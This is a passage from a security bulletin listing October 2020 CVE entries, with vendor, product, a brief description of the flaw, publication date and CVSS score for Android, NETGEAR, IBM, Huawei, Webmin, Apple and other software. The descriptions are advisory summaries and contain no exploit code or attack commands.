google — android	In updateMwi of NotificationMgr.java, there is a possible permission bypass due to a PendingIntent error. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-154323381	2020-10-14	4.9	CVE-2020-0398 MISC
google — android	In SurfaceFlinger::createLayer of SurfaceFlinger.cpp, there is a possible arbitrary code execution due to improper casting. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9Android ID: A-137284057	2020-10-14	4.6	CVE-2019-2194 MISC
google — android	In AudioFlinger::RecordThread::threadLoop of audioflinger/Threads.cpp, there is a possible non-silenced audio buffer due to a permissions bypass. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-157708122	2020-10-14	4.3	CVE-2020-0414 MISC
huawei — fusionaccess	FusionAccess version 6.5.1 has an improper authorization vulnerability. A command is authorized with incorrect privilege. Attackers with other privilege can execute the command to exploit this vulnerability. This may compromise normal service of the affected product.	2020-10-12	4.6	CVE-2020-9090 MISC
ibm — cognos_analytics	IBM Cognos Analytics 11.0 and 11.1 could be vulnerable to a denial of service attack by failing to catch exceptions in a servlet also exposing debug information could also be used in future attacks. IBM X-Force ID: 179270.	2020-10-12	6.4	CVE-2020-4388 XF CONFIRM
ibm — infosphere_information_server	IBM InfoSphere Information Server 11.5 and 11.7 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim’s Web browser within the security context of the hosting site. IBM X-Force ID: 188150.	2020-10-12	4.3	CVE-2020-4740 XF CONFIRM
ibm — security_guardium	IBM Security Guardium 11.2 could allow an attacker with admin access to obtain and read files that they normally would not have access to. IBM X-Force ID: 186423.	2020-10-12	4	CVE-2020-4678 XF CONFIRM
linux — linux_kernel	A flaw was found in the Linux kernel in versions before 5.9-rc7. Traffic between two Geneve endpoints may be unencrypted when IPsec is configured to encrypt traffic for the specific UDP port used by the GENEVE tunnel allowing anyone between the two endpoints to read the traffic unencrypted. The main threat from this vulnerability is to data confidentiality.	2020-10-13	5	CVE-2020-25645 SUSE MISC
netgear — cbr40_firmware	Certain NETGEAR devices are affected by command injection by an authenticated user. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25.	2020-10-09	5.2	CVE-2020-26910 MISC
netgear — cbr40_firmware	Certain NETGEAR devices are affected by authentication bypass. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11.	2020-10-09	5.8	CVE-2020-26928 MISC
netgear — cbr40_firmware	Certain NETGEAR devices are affected by authentication bypass. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11.	2020-10-09	5.8	CVE-2020-26926 MISC
netgear — d6100_firmware	Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6100 before 1.0.0.63, R7800 before 1.0.2.60, R8900 before 1.0.4.26, R9000 before 1.0.4.26, RBK20 before 2.3.0.28, RBR20 before 2.3.0.28, RBS20 before 2.3.0.28, RBK50 before 2.3.0.32, RBR50 before 2.3.0.32, RBS50 before 2.3.0.32, RBK40 before 2.3.0.28, RBR40 before 2.3.0.28, RBS40 before 2.3.0.28, SRK60 before 2.2.2.20, SRR60 before 2.2.2.20, SRS60 before 2.2.2.20, WN3000RPv2 before 1.0.0.78, WNDR4300v2 before 1.0.0.58, WNDR4500v3 before 1.0.0.58, WNR2000v5 before 1.0.0.70, XR450 before 2.3.2.40, and XR500 before 2.3.2.40.	2020-10-09	5.2	CVE-2020-26913 MISC
netgear — d6200_firmware	Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JR6150 before 1.0.1.24, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R6900v2 before 1.2.0.62, R7450 before 1.2.0.62, and WNR2020 before 1.1.0.62.	2020-10-09	5.2	CVE-2020-26914 MISC
netgear — d6200_firmware	Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JR6150 before 1.0.1.24, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R6900v2 before 1.2.0.62, R7450 before 1.2.0.50, and WNR2020 before 1.1.0.62.	2020-10-09	5.8	CVE-2020-26916 MISC
netgear — d6200_firmware	Certain NETGEAR devices are affected by lack of access control at the function level. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JR6150 before 1.0.1.24, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R6900v2 before 1.2.0.62, R7450 before 1.2.0.62, and WNR2020 before 1.1.0.62.	2020-10-09	5.8	CVE-2020-26911 MISC
netgear — d6200_firmware	Certain NETGEAR devices are affected by CSRF. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JR6150 before 1.0.1.24, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R6900v2 before 1.2.0.62, R7450 before 1.2.0.62, and WNR2020 before 1.1.0.62.	2020-10-09	6.8	CVE-2020-26912 MISC
netgear — ex7700_firmware	NETGEAR EX7700 devices before 1.0.0.210 are affected by incorrect configuration of security settings.	2020-10-09	5.5	CVE-2020-26930 MISC
netgear — gs110emx_firmware	Certain NETGEAR devices are affected by authentication bypass. This affects GS110EMX before 1.0.1.7, GS810EMX before 1.7.1.3, XS512EM before 1.0.1.3, and XS724EM before 1.0.1.3.	2020-10-09	5.8	CVE-2020-26921 MISC
netgear — r6230_firmware	Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6220 before 1.1.0.100 and R6230 before 1.1.0.100.	2020-10-09	5.2	CVE-2020-26929 MISC
netgear — srk60_firmware	Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects SRK60 before 2.5.3.110, SRR60 before 2.5.3.110, and SRS60 before 2.5.3.110.	2020-10-09	5.8	CVE-2020-26920 MISC
netgear — wc7500_firmware	Certain NETGEAR devices are affected by command injection by an authenticated user. This affects WC7500 before 6.5.5.24, WC7600 before 6.5.5.24, WC7600v2 before 6.5.5.24, and WC9500 before 6.5.5.24.	2020-10-09	4.6	CVE-2020-26922 MISC
onwebchat — live_chat_-_live_support	Cross-site request forgery (CSRF) vulnerability in Live Chat – Live support version 3.1.0 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors.	2020-10-15	6.8	CVE-2020-5642 MISC MISC MISC
webmin — webmin	XSS exists in Webmin 1.941 and earlier affecting the Save function of the Read User Email Module / mailboxes Endpoint when attempting to save HTML emails. This module parses any output without sanitizing SCRIPT elements, as opposed to the View function, which sanitizes the input correctly. A malicious user can send any JavaScript payload into the message body and execute it if the user decides to save that email.	2020-10-12	4.3	CVE-2020-12670 CONFIRM

Low Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
google — android	In setNotification of SapServer.java, there is a possible permission bypass due to a PendingIntent error. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-156021269	2020-10-14	2.1	CVE-2020-0410 MISC
google — android	In various locations in SystemUI, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure of contact data with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1Android ID: A-156020795	2020-10-14	2.1	CVE-2020-0415 MISC
google — android	In generateInfo of PackageInstallerSession.java, there is a possible leak of cross-profile URI data during app installation due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-142125338	2020-10-14	2.1	CVE-2020-0419 MISC
google — android	In constructImportFailureNotification of NotificationImportExportListener.java, there is a possible permissions bypass due to an unsafe PendingIntent. This could lead to local information disclosure of contact data with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-161718556	2020-10-14	2.1	CVE-2020-0422 MISC
google — android	In setProcessMemoryTrimLevel of ActivityManagerService.java, there is a missing permission check. This could lead to local information disclosure of foreground processes with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.0 Android-8.1 Android-9Android ID: A-160390416	2020-10-14	2.1	CVE-2020-0412 MISC
huawei — hirouter-cd30-10_firmware	Some Huawei products have an insufficient input verification vulnerability. Attackers can exploit this vulnerability in the LAN to cause service abnormal on affected devices.Affected product versions include:HiRouter-CD30-10 version 10.0.2.5;HiRouter-CT31-10 version 10.0.2.20;WS5200-12 version 10.0.1.9;WS5281-10 version 10.0.5.10;WS5800-10 version 10.0.3.25;WS7100-10 version 10.0.5.21;WS7200-10 version 10.0.5.21.	2020-10-12	3.3	CVE-2020-9122 MISC
huawei — p30_pro_firmware	HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) have a path traversal vulnerability. The system does not sufficiently validate certain pathname, successful exploit could allow the attacker access files and cause information disclosure.	2020-10-12	2.1	CVE-2020-9106 MISC
huawei — taurus-al00a_firmware	Taurus-AL00A version 10.0.0.1(C00E1R1P1) has an out-of-bounds read vulnerability in XFRM module. An authenticated, local attacker may perform a specific operation to exploit this vulnerability. Due to insufficient validation of the parameters, which may be exploited to cause information leak.	2020-10-12	2.1	CVE-2020-9087 MISC
huawei — taurus-an00b_firmware	Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a buffer overflow vulnerability. A function in a module does not verify inputs sufficiently. Attackers can exploit this vulnerability by sending specific request. This could compromise normal service of the affected device.	2020-10-12	3.3	CVE-2020-9238 MISC
huawei — taurus-an00b_firmware	Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a buffer overflow vulnerability. A function in a module does not verify inputs sufficiently. Attackers can exploit this vulnerability by sending specific request. This could compromise normal service of the affected device.	2020-10-12	2.1	CVE-2020-9240 MISC
huawei — taurus-an00b_firmware	Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have an information disclosure vulnerability. The device does not sufficiently validate the output of device in certain specific scenario, the attacker can gain information in the victim’s smartphone to launch the attack, successful exploit could cause information disclosure.	2020-10-12	2.1	CVE-2020-9110 MISC
huawei — taurus-an00b_firmware	Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have an out-of-bounds read and write vulnerability. Some functions do not verify inputs sufficiently. Attackers can exploit this vulnerability by sending specific request. This could compromise normal service of the affected device.	2020-10-12	2.1	CVE-2020-9091 MISC
huawei — ws5800-10_firmware	WS5800-10 version 10.0.3.25 has a denial of service vulnerability. Due to improper verification of specific message, an attacker may exploit this vulnerability to cause specific function to become abnormal.	2020-10-12	3.3	CVE-2020-9230 MISC
ibm — curam_social_program_management	A cross-site scripting (XSS) vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. This vulnerability allows attackers to inject malicious scripts into web applications for the purpose of running unwanted actions on the end user’s device, restricted to a single location. IBM X-Force ID: 189153.	2020-10-12	3.5	CVE-2020-4775 XF CONFIRM
ibm — infosphere_information_server	IBM InfoSphere Information Server 11.5 and 11.7 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188197.	2020-10-12	3.5	CVE-2020-4741 XF CONFIRM
ibm — security_guardium	IBM Security Guardium 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186424.	2020-10-12	3.5	CVE-2020-4679 XF CONFIRM
ibm — security_guardium	IBM Security Guardium 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186427.	2020-10-12	3.5	CVE-2020-4681 XF CONFIRM
ibm — security_guardium	IBM Security Guardium 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186426.	2020-10-12	3.5	CVE-2020-4680 XF CONFIRM
netgear — cbr40_firmware	Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11.	2020-10-09	3.3	CVE-2020-26905 MISC
netgear — cbr40_firmware	Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11.	2020-10-09	3.3	CVE-2020-26904 MISC
netgear — cbr40_firmware	Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11.	2020-10-09	3.3	CVE-2020-26903 MISC
netgear — cbr40_firmware	Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25.	2020-10-09	3.3	CVE-2020-26900 MISC
netgear — cbr40_firmware	Certain NETGEAR devices are affected by disclosure of sensitive information. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11.	2020-10-09	3.3	CVE-2020-26899 MISC
netgear — d7800_firmware	Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.	2020-10-09	3.5	CVE-2020-26915 MISC
netgear — ex7000_firmware	Certain NETGEAR devices are affected by stored XSS. This affects EX7000 before 1.0.1.78, R6250 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R8300 before 1.0.2.128, and R8500 before 1.0.2.128.	2020-10-09	3.5	CVE-2020-26917 MISC
netgear — gs808e_firmware	NETGEAR GS808E devices before 1.7.1.0 are affected by denial of service.	2020-10-09	2.1	CVE-2020-26925 MISC
netgear — rbk752_firmware	Certain NETGEAR devices are affected by disclosure of sensitive information. This affects RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25.	2020-10-09	3.3	CVE-2020-26901 MISC
netgear — wc7500_firmware	Certain NETGEAR devices are affected by disclosure of sensitive information. This affects WC7500 before 6.5.5.24, WC7600 before 6.5.5.24, WC7600v2 before 6.5.5.24, and WC9500 before 6.5.5.24.	2020-10-09	3.3	CVE-2020-26931 MISC
netgear — wc7500_firmware	Certain NETGEAR devices are affected by stored XSS. This affects WC7500 before 6.5.5.24, WC7600 before 6.5.5.24, WC7600v2 before 6.5.5.24, and WC9500 before 6.5.5.24.	2020-10-09	3.5	CVE-2020-26923 MISC
webmin — webmin	An Improper Data Validation Vulnerability exists in Webmin 1.941 and earlier affecting the Command Shell Endpoint. A user may enter HTML code into the Command field and submit it. Then, after visiting the Action Logs Menu and displaying logs, the HTML code will be rendered (however, JavaScript is not executed). Changes are kept across users.	2020-10-12	3.5	CVE-2020-8821 MISC
webmin — webmin	An XSS Vulnerability exists in Webmin 1.941 and earlier affecting the Cluster Shell Commands Endpoint. A user may enter any XSS Payload into the Command field and execute it. Then, after revisiting the Cluster Shell Commands Menu, the XSS Payload will be rendered and executed.	2020-10-12	3.5	CVE-2020-8820 CONFIRM

Severity Not Yet Assigned

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
adobe — flash_player	Adobe Flash Player version 32.0.0.433 (and earlier) are affected by an exploitable NULL pointer dereference vulnerability that could result in a crash and arbitrary code execution. Exploitation of this issue requires an attacker to insert malicious strings in an HTTP response that is by default delivered over TLS/SSL.	2020-10-14	not yet calculated	CVE-2020-9746 MISC
adobe — magento	Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by a persistent XSS vulnerability that allows users to upload malicious JavaScript via the file upload component. This vulnerability could be abused by an unauthenticated attacker to execute XSS attacks against other Magento users. This vulnerability requires a victim to browse to the uploaded file.	2020-10-16	not yet calculated	CVE-2020-24408 MISC
amazon — aws_firecracker	In Amazon AWS Firecracker before 0.21.3, and 0.22.x before 0.22.1, the serial console buffer can grow its memory usage without limit when data is sent to the standard input. This can result in a memory leak on the microVM emulation thread, possibly occupying more memory than intended on the host.	2020-10-16	not yet calculated	CVE-2020-27174 MISC MISC MISC
amd — multiple_graphics_drivers	A denial of service vulnerability exists in the D3DKMTEscape handler functionality of AMD ATIKMDAG.SYS (e.g. version 26.20.15029.27017). A specially crafted D3DKMTEscape API request can cause an out-of-bounds read in Windows OS kernel memory area. This vulnerability can be triggered from a non-privileged account.	2020-10-13	not yet calculated	CVE-2020-12933 MISC
amd — multiple_graphics_drivers	A denial of service vulnerability exists in the D3DKMTCreateAllocation handler functionality of AMD ATIKMDAG.SYS (e.g. version 26.20.15029.27017). A specially crafted D3DKMTCreateAllocation API request can cause an out-of-bounds read and denial of service (BSOD). This vulnerability can be triggered from a non-privileged account.	2020-10-13	not yet calculated	CVE-2020-12911 MISC
amd — ryzen_master	A vulnerability in a dynamically loaded AMD driver in AMD Ryzen Master V15 may allow any authenticated user to escalate privileges to NT authority system.	2020-10-13	not yet calculated	CVE-2020-12928 MISC
anuko — time_tracker	In Anuko Time Tracker before verion 1.19.23.5325, due to not properly filtered user input a CSV export of a report could contain cells that are treated as formulas by spreadsheet software (for example, when a cell value starts with an equal sign). This is fixed in version 1.19.23.5325.	2020-10-16	not yet calculated	CVE-2020-15255 MISC CONFIRM
apache — solr	Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that’s uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.	2020-10-13	not yet calculated	CVE-2020-13957 MLIST MISC
apache — tomcat	If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers – including HTTP/2 pseudo headers – from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources.	2020-10-12	not yet calculated	CVE-2020-13943 MISC MLIST CONFIRM
apereo — cas	Apereo CAS 5.3.x before 5.3.16, 6.x before 6.1.7.2, 6.2.x before 6.2.4, and 6.3.x before 6.3.0-RC4 mishandles secret keys with Google Authenticator for multifactor authentication.	2020-10-16	not yet calculated	CVE-2020-27178 MISC
apple — ios_and_ipados	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.0 and iPadOS 14.0. An application may be able to cause unexpected system termination or write kernel memory.	2020-10-16	not yet calculated	CVE-2020-9958 MISC
apple — ios_and_ipados	This issue was addressed with improved checks. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may be able to cause a denial of service.	2020-10-16	not yet calculated	CVE-2020-9917 MISC
apple — ios_and_ipados	A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 14.0 and iPadOS 14.0. A local user may be able to read kernel memory.	2020-10-16	not yet calculated	CVE-2020-9964 MISC
apple — ios_and_ipados	A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may cause an unexpected application termination.	2020-10-16	not yet calculated	CVE-2020-9931 MISC
apple — ios_and_ipados	A lock screen issue allowed access to messages on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0. A person with physical access to an iOS device may be able to view notification contents from the lockscreen.	2020-10-16	not yet calculated	CVE-2020-9959 MISC
apple — macos_catalina	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges.	2020-10-16	not yet calculated	CVE-2020-9799 MISC
apple — macos_catalina	A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.	2020-10-16	not yet calculated	CVE-2020-9864 MISC
apple — macos_catalina	This issue was addressed with improved data protection. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to leak sensitive user information.	2020-10-16	not yet calculated	CVE-2020-9913 MISC
apple — multiple_products	A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9878 MISC MISC MISC
apple — multiple_products	An issue existed in the handling of iMessage tapbacks. The issue was resolved with additional verification. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A user that is removed from an iMessage group could rejoin the group.	2020-10-16	not yet calculated	CVE-2020-9885 MISC MISC MISC MISC
apple — multiple_products	An input validation issue existed in Bluetooth. This issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An attacker in a privileged network position may be able to perform denial of service attack using malformed Bluetooth packets.	2020-10-16	not yet calculated	CVE-2020-9914 MISC MISC
apple — multiple_products	A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9893 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to break out of its sandbox.	2020-10-16	not yet calculated	CVE-2020-9865 MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9888 MISC MISC MISC MISC
apple — multiple_products	This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network.	2020-10-16	not yet calculated	CVE-2020-9992 MISC MISC
apple — multiple_products	An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information.	2020-10-16	not yet calculated	CVE-2020-9934 MISC MISC
apple — multiple_products	Multiple issues were addressed with improved logic. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication.	2020-10-16	not yet calculated	CVE-2020-9910 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations.	2020-10-16	not yet calculated	CVE-2020-9909 MISC MISC MISC
apple — multiple_products	A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9895 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An access issue existed in Content Security Policy. This issue was addressed with improved access restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.	2020-10-16	not yet calculated	CVE-2020-9915 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges.	2020-10-16	not yet calculated	CVE-2020-9923 MISC MISC
apple — multiple_products	An authorization issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to read sensitive location information.	2020-10-16	not yet calculated	CVE-2020-9933 MISC MISC MISC
apple — multiple_products	An input validation issue was addressed with improved input validation. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0, Safari 14.0, iCloud for Windows 11.4, iCloud for Windows 7.21. Processing maliciously crafted web content may lead to a cross site scripting attack.	2020-10-16	not yet calculated	CVE-2020-9952 MISC MISC MISC MISC MISC MISC
apple — multiple_products	A logic issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may lead to universal cross site scripting.	2020-10-16	not yet calculated	CVE-2020-9925 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.	2020-10-16	not yet calculated	CVE-2020-9918 MISC MISC MISC MISC
apple — multiple_products	A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. A malicious attacker may cause Safari to suggest a password for the wrong domain.	2020-10-16	not yet calculated	CVE-2020-9903 MISC MISC
apple — multiple_products	A command injection issue existed in Web Inspector. This issue was addressed with improved escaping. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Copying a URL from Web Inspector may lead to command injection.	2020-10-16	not yet calculated	CVE-2020-9862 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An application may be able to execute arbitrary code with kernel privileges.	2020-10-16	not yet calculated	CVE-2020-9907 MISC MISC
apple — multiple_products	A URL Unicode encoding issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker may be able to conceal the destination of a URL.	2020-10-16	not yet calculated	CVE-2020-9916 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	This issue was addressed with improved checks. This issue is fixed in iOS 14.0 and iPadOS 14.0, watchOS 7.0. The screen lock may not engage after the specified time period.	2020-10-16	not yet calculated	CVE-2020-9946 MISC MISC
